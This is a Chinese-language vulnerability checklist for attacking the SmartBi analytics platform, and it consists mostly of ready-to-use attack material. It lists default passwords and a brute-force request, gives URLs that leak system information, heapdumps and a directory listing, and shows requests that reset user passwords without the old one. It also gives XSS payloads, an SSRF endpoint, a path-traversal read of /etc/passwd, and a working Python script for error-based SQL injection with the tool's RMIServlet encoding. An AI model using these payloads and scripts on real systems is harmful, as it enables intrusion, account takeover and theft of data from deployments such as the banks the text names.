# SmartBi 漏洞 Checklist ## 一、前置知识 ### 0x01 SmartBi 概述 Smartbi 是企业级商业智能和大数据分析平台,满足用户在企业级报表、数据可视化分析、自助分析平台、数据挖掘建模、AI 智能分析等大数据分析需求。该软件应用范围较广,据官网介绍,在全球财富 500 强的 10 家国内银行,有 8 家选用了 Smartbi。 ### 0x02 FOFA指纹 ``` app="SMARTBI" ``` ### 0x03 登录入口 ``` https://127.0.0.1/vision/mobileportal.jsp https://127.0.0.1/vision/mobileX/login https://127.0.0.1/vision/index.jsp https://127.0.0.1/smartbi/vision/index.jsp ``` 密码正确的情况下,部分平台无法登陆,此时设置user-agent为手机端就可以。 ### 0x04 常见口令 ``` demo/demo manager/demo admin/admin admin/manager admin/2manager ``` ## 二、认证漏洞 ### 0x01 登录爆破 ``` POST /vision/RMIServlet HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; PRA-LX3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.101 Mobile Safari/537.36 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: https://127.0.0.1/vision/mobileX/login content-type: application/x-www-form-urlencoded Content-Length: 70 Authorization: Basic YWRtaW46YWRtaW4= Connection: close Cookie: JSESSIONID=1DA1DAA51469E646F97AD829F29A2B15 className=UserService&methodName=login¶ms=["admin","admin"] ``` 抓取 true/false 字段。 ### 0x02 401认证弱口令 /vision 目录下的文件都需要 401 认证: ``` admin/admin admin/manager admin/2manager mining/admin demo/demo manager/demo manager/admin user/admin test/admin huanan/admin ``` 不论用户名输什么,只要密码正确即可。 ## 三、信息泄露 ### 0x01 敏感信息 #### 查看版本 ``` https://127.0.0.1/vision/version.txt ``` ``` https://127.0.0.1/vision/packageinfo.txt ``` #### 目录遍历 ``` https://127.0.0.1/vision/chooser.jsp?key=CONFIG_FILE_DIR&root=%2F ``` #### 信息泄露 ``` https://127.0.0.1/vision/monitor/sysprops.jsp ``` ``` https://127.0.0.1/vision/monitor/getclassurl.jsp?classname=smartbi.freequery.expression.ast.TextNode ``` ``` https://127.0.0.1/vision/monitor/hardwareinfo.jsp ``` #### 接口泄露 直接访问 wsdl 无需 401: ``` https://127.0.0.1/vision/listwsdl.jsp ``` 提供资源目录树的访问功能: ``` https://127.0.0.1/vision/services/CatalogService?wsdl ``` SimpleReportService 提供灵活报表相关操作功能: ``` https://127.0.0.1/vision/services/SimpleReportService?wsdl ``` BusinessViewService 提供数据集定义相关操作功能: ``` https://127.0.0.1/vision/services/BusinessViewService?wsdl ``` DataSourceService 提供数据源相关操作功能: ``` https://127.0.0.1/vision/services/DataSourceService?wsdl ``` AnalysisReportService 提供多维分析相关操作功能: ``` https://127.0.0.1/vision/services/AnalysisReportService?wsdl ``` UserManagerService 提供用户相关操作,包括读取/维护用户信息、读取/维护组信息、读取/维护角色信息、为用户和组分配角色等: ``` https://127.0.0.1/vision/services/UserManagerService?wsdl ``` ### 0x02 Session劫持 可重置用户密码,且无需原密码。 ``` https://127.0.0.1/vision/monitor/listsessions.jsp ``` ![image-20230717111349311](images/image-20230717111349311.png) 理论上重置成功,返回为 true,但是实际测试过程中修改后的密码既不是改之前的密码,也不是修改后的密码,过一段时间自动重置为原来的密码。 ``` POST /vision/RMIServlet HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: https://127.0.0.1/vision/index.jsp If-Modified-Since: 0 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Content-Length: 148 Authorization: Basic YWRtaW46YWRtaW4= Connection: close Cookie: JSESSIONID=848B4743452D02C5A53FECCA58C47299 className=UserService&methodName=updateUserForChange¶ms=["I8a94ca4e0175ab4aab4aaae90175d3e824c66a87","zhongguo1","null","QWEqwe123",true] ``` ``` POST /vision/RMIServlet HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: https://127.0.0.1/vision/index.jsp If-Modified-Since: 0 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Content-Length: 133 Authorization: Basic YWRtaW46YWRtaW4= Connection: close Cookie: JSESSIONID=848B4743452D02C5A53FECCA58C47299 className=UserService&methodName=addUserAttribute¶ms=["I8a94ca4e0175ab4aab4aaae90175d3e824c66a87","SYSTEM_user_isEdit","0",null] ``` 其中I8a94ca4e0175ab4aab4aaae90175d3e824c66a87为用户的id字段,唯一身份标识。 ### 0x03 Heapdump泄露 ``` https://127.0.0.1/vision/monitor/heapdump.jsp ``` ``` https://127.0.0.1/vision/monitor/heapdump.jsp?dumpbin=true ``` ### 0x04 反射型/存储型XSS ``` https://127.0.0.1/vision/chooser.jsp?key=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E&root=/u01/data/domains/app_domain ``` ``` https://127.0.0.1/vision/monitor/testmailserver.jsp?host=mail.longtop.com&user=111%22%3E%3Cimg%20src=x%20onerror=prompt(0)%3E&pass=123456 ``` 登录后个人参数位置,加密后传参可导致存储型 xss。 ### 0x05 SSRF 探测出口ip: ``` https://127.0.0.1/vision/monitor/testmailserver.jsp ``` ## 四、SQL注入 需要登录,任意报表功能,例如: ``` https://127.0.0.1/vision/ssreportServlet ``` ``` POST /vision/ssreportServlet HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: https://127.0.0.1/vision/openresource.jsp?iPad=true&refresh=true&showtoolbar=false&showPath=false&resid=I40281d81016a8bc28bc20231016aaee007b230ac&_timestamp=1610433924926 Content-Type: application/x-www-form-urlencoded Content-Length: 3293 Authorization: Basic YWRtaW46YWRtaW4= Connection: close Cookie: FQPassword=; JSESSIONID=4BB550BF10C606619B753D3CE52CD3AB Upgrade-Insecure-Requests: 1 sheetIndex=0&resid=I40281d81016a8bc28bc20231016aaee007b230ac&clientId=Iff8080810176f0c7f0c7544f0176f54eb72c1160&refreshType=refresh¶msInfoEncode=encode=/JV/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aJ/'T/mJ/aK/VT/'T/aJ/m7/'T/a9/O9/V7/uu/ut/uu6(dp/uu/NO/uu/aJ/'T/mJ/aK/VT/'T/aJ/m7/'T/a9/O9/V7/uu/ut/uu(SR(D/uu/NO/uu/aJ/'T/mJ/aK/VT/'T/aJ/m7/'T/a9/O9/V7/uu/ut/uug(SQp/uu/NO/uun111/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uun111/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aM/'m/'7/aJ/V1/ma/aM/mt/VO/aM/ma/'K/uu/ut/uu6(dp/uu/NO/uu/aM/'m/'7/aJ/V1/ma/aM/mt/VO/aM/ma/'K/uu/ut/uu(SR(D/uu/NO/uu/aM/'m/'7/aJ/V1/ma/aM/mt/VO/aM/ma/'K/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aM/'m/'7/aJ/mt/O'/a9/mt/'1/aK/VV/VT/uu/ut/uu6(dp/uu/NO/uu/aM/'m/'7/aJ/mt/O'/a9/mt/'1/aK/VV/VT/uu/ut/uu(SR(D/uu/NO/uu/aM/'m/'7/aJ/mt/O'/a9/mt/'1/aK/VV/VT/uu/ut/uug(SQp/uu/NO/uuKK7777/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/aJ/Vm/Vx/aK/V'/mt/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aM/'m/'7/aJ/mt/O'/aJ/mt/V7/aJ/V'/'u/uu/ut/uu6(dp/uu/NO/uu/aM/'m/'7/aJ/mt/O'/aJ/mt/V7/aJ/V'/'u/uu/ut/uu(SR(D/uu/NO/uu/aM/'m/'7/aJ/mt/O'/aJ/mt/V7/aJ/V'/'u/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/aJ/'J/O'/am/'N/O'/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aM/'m/'7/aJ/mt/O'/aJ/'t/VO/aJ/'a/Vx/uu/ut/uu6(dp/uu/NO/uu/aM/'m/'7/aJ/mt/O'/aJ/'t/VO/aJ/'a/Vx/uu/ut/uu(SR(D/uu/NO/uu/aM/'m/'7/aJ/mt/O'/aJ/'t/VO/aJ/'a/Vx/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/aJ/'J/O'/am/'N/O'/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~MqRh/uu/ut/uu6(dp/uu/NO/uuRh/uu/ut/uu(SR(D/uu/NO/uu/aM/ON/'7/aM/VJ/'V/aM/mt/VO/aM/ma/'KRh/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aJ/O1/OV/aM/'O/OJ/aM/m9/VM/am/m9/VK/a'/VJ/V9/uu/ut/uu6(dp/uu/NO/uu/aJ/O1/OV/aM/'O/OJ/aM/m9/VM/am/m9/VK/a'/VJ/V9/uu/ut/uu(SR(D/uu/NO/uu/aJ/O1/OV/aM/'O/OJ/aM/m9/VM/am/m9/VK/a'/VJ/V9/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aJ/O1/OV/aM/'O/OJ/aM/m9/VM/am/m9/VK/aM/OT/Ou/uu/ut/uu6(dp/uu/NO/uu/aJ/O1/OV/aM/'O/OJ/aM/m9/VM/am/m9/VK/aM/OT/Ou/uu/ut/uu(SR(D/uu/NO/uu/aJ/O1/OV/aM/'O/OJ/aM/m9/VM/am/m9/VK/aM/OT/Ou/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aM/mV/VK/aM/mM/V7/aM/m9/VM/am/m9/VK/a'/VJ/V9/uu/ut/uu6(dp/uu/NO/uu/aM/mV/VK/aM/mM/V7/aM/m9/VM/am/m9/VK/a'/VJ/V9/uu/ut/uu(SR(D/uu/NO/uu/aM/mV/VK/aM/mM/V7/aM/m9/VM/am/m9/VK/a'/VJ/V9/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/uu/9T/ut/9V/uuRh/uu/NO/uuoQk5QkL(4(dpkp4qcK7u'1h'171M('~iu'~iu7uN171M((7~pu1m9u'~Mq/aM/mV/VK/aM/mM/V7/aM/m9/VM/am/m9/VK/aM/OT/Ou/uu/ut/uu6(dp/uu/NO/uu/aM/mV/VK/aM/mM/V7/aM/m9/VM/am/m9/VK/aM/OT/Ou/uu/ut/uu(SR(D/uu/NO/uu/aM/mV/VK/aM/mM/V7/aM/m9/VM/am/m9/VK/aM/OT/Ou/uu/ut/uug(SQp/uu/NO/uu/uu/ut/uuhRD5S(2Z(SQp/uu/NO/uu/uu/9T/JT&pageId=0&writeBackData=&exportSheetIndexes=&exportId=&op=%7B%22getTotalPages%22%3Atrue%2C%22sheetPageCounts%22%3A%5B1%5D%7D ``` #### 0x01 解码并修改数据包直接注入 修改 paramsInfoEncode 为 paramsInfo,将 Encode 参数去掉(以下payload 可直接使用): ``` POST /vision/ssreportServlet HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: https://127.0.0.1/vision/openresource.jsp?iPad=true&refresh=true&showtoolbar=false&showPath=false&resid=I40281d81016a8bc28bc20231016aaee007b230ac&_timestamp=1610433924926 Content-Type: application/x-www-form-urlencoded Content-Length: 3282 Authorization: Basic YWRtaW46YWRtaW4= Connection: close Cookie: FQPassword=; JSESSIONID=4BB550BF10C606619B753D3CE52CD3AB Upgrade-Insecure-Requests: 1 sheetIndex=0&resid=I40281d81016a8bc28bc20231016aaee007b230ac&clientId=Iff8080810176f0c7f0c7544f0176f54eb72c1160&refreshType=refresh¶msInfo=%5B%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E5%8D%95%E4%BD%8D%E5%90%8D%E7%A7%B0%22%2C%22name%22%3A%22%E5%8D%95%E4%BD%8D%E5%90%8D%E7%A7%B0%22%2C%22alias%22%3A%22%E5%8D%95%E4%BD%8D%E5%90%8D%E7%A7%B0%22%2C%22value%22%3A%22'11111%22%2C%22displayValue%22%3A%22'11111%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E6%89%80%E5%B1%9E%E6%9C%BA%E6%9E%84%22%2C%22name%22%3A%22%E6%89%80%E5%B1%9E%E6%9C%BA%E6%9E%84%22%2C%22alias%22%3A%22%E6%89%80%E5%B1%9E%E6%9C%BA%E6%9E%84%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E6%89%80%E5%9C%A8%E7%9C%81%E4%BB%BD%22%2C%22name%22%3A%22%E6%89%80%E5%9C%A8%E7%9C%81%E4%BB%BD%22%2C%22alias%22%3A%22%E6%89%80%E5%9C%A8%E7%9C%81%E4%BB%BD%22%2C%22value%22%3A%22440000%22%2C%22displayValue%22%3A%22%E5%B9%BF%E4%B8%9C%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E6%89%80%E5%9C%A8%E5%9C%B0%E5%B8%82%22%2C%22name%22%3A%22%E6%89%80%E5%9C%A8%E5%9C%B0%E5%B8%82%22%2C%22alias%22%3A%22%E6%89%80%E5%9C%A8%E5%9C%B0%E5%B8%82%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%E5%85%A8%E9%83%A8%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E6%89%80%E5%9C%A8%E5%8C%BA%E5%8E%BF%22%2C%22name%22%3A%22%E6%89%80%E5%9C%A8%E5%8C%BA%E5%8E%BF%22%2C%22alias%22%3A%22%E6%89%80%E5%9C%A8%E5%8C%BA%E5%8E%BF%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%E5%85%A8%E9%83%A8%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.id%22%2C%22name%22%3A%22id%22%2C%22alias%22%3A%22%E6%A3%80%E6%B5%8B%E6%9C%BA%E6%9E%84id%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E5%A1%AB%E6%8A%A5%E6%97%B6%E9%97%B4%E8%B5%B7%22%2C%22name%22%3A%22%E5%A1%AB%E6%8A%A5%E6%97%B6%E9%97%B4%E8%B5%B7%22%2C%22alias%22%3A%22%E5%A1%AB%E6%8A%A5%E6%97%B6%E9%97%B4%E8%B5%B7%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E5%A1%AB%E6%8A%A5%E6%97%B6%E9%97%B4%E6%AD%A2%22%2C%22name%22%3A%22%E5%A1%AB%E6%8A%A5%E6%97%B6%E9%97%B4%E6%AD%A2%22%2C%22alias%22%3A%22%E5%A1%AB%E6%8A%A5%E6%97%B6%E9%97%B4%E6%AD%A2%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4%E8%B5%B7%22%2C%22name%22%3A%22%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4%E8%B5%B7%22%2C%22alias%22%3A%22%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4%E8%B5%B7%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%22%7D%2C%7B%22id%22%3A%22OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4%E6%AD%A2%22%2C%22name%22%3A%22%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4%E6%AD%A2%22%2C%22alias%22%3A%22%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4%E6%AD%A2%22%2C%22value%22%3A%22%22%2C%22displayValue%22%3A%22%22%7D%5D&pageId=0&writeBackData=&exportSheetIndexes=&exportId=&op=%7B%22getTotalPages%22%3Atrue%2C%22sheetPageCounts%22%3A%5B1%5D%7D ``` #### 0x02 RMIServet加密后注入 报错注入脚本: ``` #coding=utf-8 import requests from urllib.parse import quote,unquote import re from requests.packages.urllib3.exceptions import InsecureRequestWarning #去除https的warning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) ENCODING_SCHEDULE = { "0": "7", "1": "1", "2": "u", "3": "N", "4": "K", "5": "J", "6": "M", "7": "9", "8": "'", "9": "m", "!": "P", "%": "/", "'": "n", "(": "A", ")": "E", "*": "s", "+": "+", "-": "f", ".": "q", "A": "O", "B": "V", "C": "t", "D": "T", "E": "a", "F": "x", "G": "H", "H": "r", "I": "c", "J": "v", "K": "l", "L": "8", "M": "F", "N": "3", "O": "o", "P": "L", "Q": "Y", "R": "j", "S": "W", "T": "*", "U": "z", "V": "Z", "W": "!", "X": "B", "Y": ")", "Z": "U", "a": "(", "b": "~", "c": "i", "d": "h", "e": "p", "f": "_", "g": "-", "h": "I", "i": "R", "j": ".", "k": "G", "l": "S", "m": "d", "n": "6", "o": "w", "p": "5", "q": "0", "r": "4", "s": "D", "t": "k", "u": "Q", "v": "g", "w": "b", "x": "C", "y": "2", "z": "X", "~": "e", "_": "y", } DECODING_SCHEDULE = { "7": "0", "1": "1", "u": "2", "N": "3", "K": "4", "J": "5", "M": "6", "9": "7", "'": "8", "m": "9", "P": "!", "/": "%", "n": "'", "A": "(", "E": ")", "s": "*", "+": "+", "f": "-", "q": ".", "O": "A", "V": "B", "t": "C", "T": "D", "a": "E", "x": "F", "H": "G", "r": "H", "c": "I", "v": "J", "l": "K", "8": "L", "F": "M", "3": "N", "o": "O", "L": "P", "Y": "Q", "j": "R", "W": "S", "*": "T", "z": "U", "Z": "V", "!": "W", "B": "X", ")": "Y", "U": "Z", "(": "a", "~": "b", "i": "c", "h": "d", "p": "e", "_": "f", "-": "g", "I": "h", "R": "i", ".": "j", "G": "k", "S": "l", "d": "m", "6": "n", "w": "o", "5": "p", "0": "q", "4": "r", "D": "s", "k": "t", "Q": "u", "g": "v", "b": "w", "C": "x", "2": "y", "X": "z", "e": "~", "y": "_", } #此函数可以用来加密明文也可以解密服务器返回的密文 def encode(code): out = "" for item in code: out = out + ENCODING_SCHEDULE.get(item, item) return out def decode(code): out = "" for item in code: out = out + DECODING_SCHEDULE.get(item, item) return out url = "https://127.0.0.1/vision/ssreportServlet" headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36", "Accept-Encoding":"gzip, deflate", "Content-Type":"application/x-www-form-urlencoded", "Cookie":"JSESSIONID=4BB550BF10C606619B753D3CE52CD3AB" } origin1 = '''[{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.单位名称","name":"单位名称","alias":"单位名称","value":"''' origin2 = '''","displayValue":"''' origin3 = '''"},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.所属机构","name":"所属机构","alias":"所属机构","value":"","displayValue":""},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.所在省份","name":"所在省份","alias":"所在省份","value":"440000","displayValue":"广东"},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.所在地市","name":"所在地市","alias":"所在地市","value":"","displayValue":"全部"},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.所在区县","name":"所在区县","alias":"所在区县","value":"","displayValue":"全部"},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.id","name":"id","alias":"检测机构id","value":"","displayValue":""},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.填报时间起","name":"填报时间起","alias":"填报时间起","value":"","displayValue":""},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.填报时间止","name":"填报时间止","alias":" 填报时间止","value":"","displayValue":""},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.更新时间起","name":"更新时间起","alias":"更新时间起","value":"","displayValue":""},{"id":"OutputParameter.I40281d81016a8bc28bc20231016aa0be219728b6.更新时间止","name":"更新时间止","alias":"更新时间止","value":"","displayValue":""}]''' for i in range(1,20): payload = "%' and extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit {0},1),0x7e)) and null = '%".format(i) # print(payload) origin_full = origin1 + payload + origin2 + payload + origin3 # print(origin_full) url_encode_full = quote(origin_full) # print(url_encode_full) rmi_encode = encode(url_encode_full) # print(rmi_encode) encode_final = 'encode='+rmi_encode data = { "resid":"I40281d81016a8bc28bc20231016aaee007b230ac", "clientId":"Iff8080810176f0c7f0c7544f0176f54eb72c1160", "refreshType":"refresh", "paramsInfoEncode":encode_final } #proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} r = requests.post(url,data=data,headers=headers,verify=False) #print(r.text) regex = r"~\w+~" match = re.search(regex,r.text).span() #返回第一个匹配到的结果的位置(1000,1005) database = r.text[match[0]+1:match[1]-1] print(r.text[match[0]:match[1]]) with open('file.txt','a+') as f: f.write(database+'\n') ``` ## 五、任意文件读取 V85以下的可能任意文件下载都有,V95版本不存在。 ``` https://127.0.0.1/vision/FileServlet?ftpType=out&path=upload/../../../../../../../../../../etc/passwd&name=%E4%B8%AD%E5%9B%BD%E7%9F%B3%E6%B2%B9%E5%90%89%E6%9E%97%E7%99%BD%E5%9F%8E%E9%94%80%E5%94%AE%E5%88%86%E5%85%AC%E5%8F%B8XX%E5%8A%A0%E6%B2%B9%E7%AB%99%E9%98%B2%E9%9B%B7%E5%AE%89%E5%85%A8%E5%BA%94%E6%80%A5%E9%A2%84%E6%A1%88.docx ``` ## 附录、RMIServet加解密 SmartBi 有两种传参方式,RMIServlet 加密或直接传输。 ### 0x01 RMIServlet加密 ``` POST /vision/RMIServlet HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: https://127.0.0.1/vision/index.jsp If-Modified-Since: 0 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Content-Length: 148 Authorization: Basic YWRtaW46YWRtaW4= Connection: close Cookie: JSESSIONID=848B4743452D02C5A53FECCA58C47299 encode=zDp4Wp4gRip+Q5h(kpzDp4xw4tI(6-p+/JV/uuc'(mKi(Kp719J(~K((~K(((pm719JhNp'uKiMM('9/uu/ut/uuXIw6--Qw1/uu/ut/uu6QSS/uu/ut/uuY!a0bp1uN/uu/utk4Qp/JT ``` ### 0x02 直接传输 上述encode加密字段解密后为: ``` UserService+updateUserForChange+["I8a94ca4e0175ab4aab4aaae90175d3e824c66a87","zhongguo1","null","QWEqwe123",true] ``` 等同于: ``` className=UserService&methodName=updateUserForChange¶ms=["I8a94ca4e0175ab4aab4aaae90175d3e824c66a87","zhongguo1","null","QWEqwe123",true] ``` 构造数据包: ``` POST /vision/RMIServlet HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: https://127.0.0.1/vision/index.jsp If-Modified-Since: 0 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Content-Length: 148 Authorization: Basic YWRtaW46YWRtaW4= Connection: close Cookie: JSESSIONID=848B4743452D02C5A53FECCA58C47299 className=UserService&methodName=updateUserForChange¶ms=["I8a94ca4e0175ab4aab4aaae90175d3e824c66a87","zhongguo1","null","QWEqwe123",true] ``` ### 0x03 RMIServet加解密脚本 ```python from urllib.parse import unquote from urllib.parse import quote ENCODING_SCHEDULE = { "0": "7", "1": "1", "2": "u", "3": "N", "4": "K", "5": "J", "6": "M", "7": "9", "8": "'", "9": "m", "!": "P", "%": "/", "'": "n", "(": "A", ")": "E", "*": "s", "+": "+", "-": "f", ".": "q", "A": "O", "B": "V", "C": "t", "D": "T", "E": "a", "F": "x", "G": "H", "H": "r", "I": "c", "J": "v", "K": "l", "L": "8", "M": "F", "N": "3", "O": "o", "P": "L", "Q": "Y", "R": "j", "S": "W", "T": "*", "U": "z", "V": "Z", "W": "!", "X": "B", "Y": ")", "Z": "U", "a": "(", "b": "~", "c": "i", "d": "h", "e": "p", "f": "_", "g": "-", "h": "I", "i": "R", "j": ".", "k": "G", "l": "S", "m": "d", "n": "6", "o": "w", "p": "5", "q": "0", "r": "4", "s": "D", "t": "k", "u": "Q", "v": "g", "w": "b", "x": "C", "y": "2", "z": "X", "~": "e", "_": "y", } DECODING_SCHEDULE = { "7": "0", "1": "1", "u": "2", "N": "3", "K": "4", "J": "5", "M": "6", "9": "7", "'": "8", "m": "9", "P": "!", "/": "%", "n": "'", "A": "(", "E": ")", "s": "*", "+": "+", "f": "-", "q": ".", "O": "A", "V": "B", "t": "C", "T": "D", "a": "E", "x": "F", "H": "G", "r": "H", "c": "I", "v": "J", "l": "K", "8": "L", "F": "M", "3": "N", "o": "O", "L": "P", "Y": "Q", "j": "R", "W": "S", "*": "T", "z": "U", "Z": "V", "!": "W", "B": "X", ")": "Y", "U": "Z", "(": "a", "~": "b", "i": "c", "h": "d", "p": "e", "_": "f", "-": "g", "I": "h", "R": "i", ".": "j", "G": "k", "S": "l", "d": "m", "6": "n", "w": "o", "5": "p", "0": "q", "4": "r", "D": "s", "k": "t", "Q": "u", "g": "v", "b": "w", "C": "x", "2": "y", "X": "z", "e": "~", "y": "_", } #此函数可以用来加密明文也可以解密服务器返回的密文 def encode(code): out = "" for item in code: out = out + ENCODING_SCHEDULE.get(item, item) return out def decode(code): out = "" for item in code: out = out + DECODING_SCHEDULE.get(item, item) return out def read(): with open('read.txt', 'r') as f: return f.read() a=read() b = decode(a) c = encode(a) print('Input: ' + a + '\n') print('decode: ' + b + '\n') print('decode-unquote-url: '+unquote(b,'utf-8')) print('encode: '+c) ``` 注:加密和解密的过程就是替换字符的过程,最终解密得到的是 url 编码,加密时传入的文本也要是 url 编码。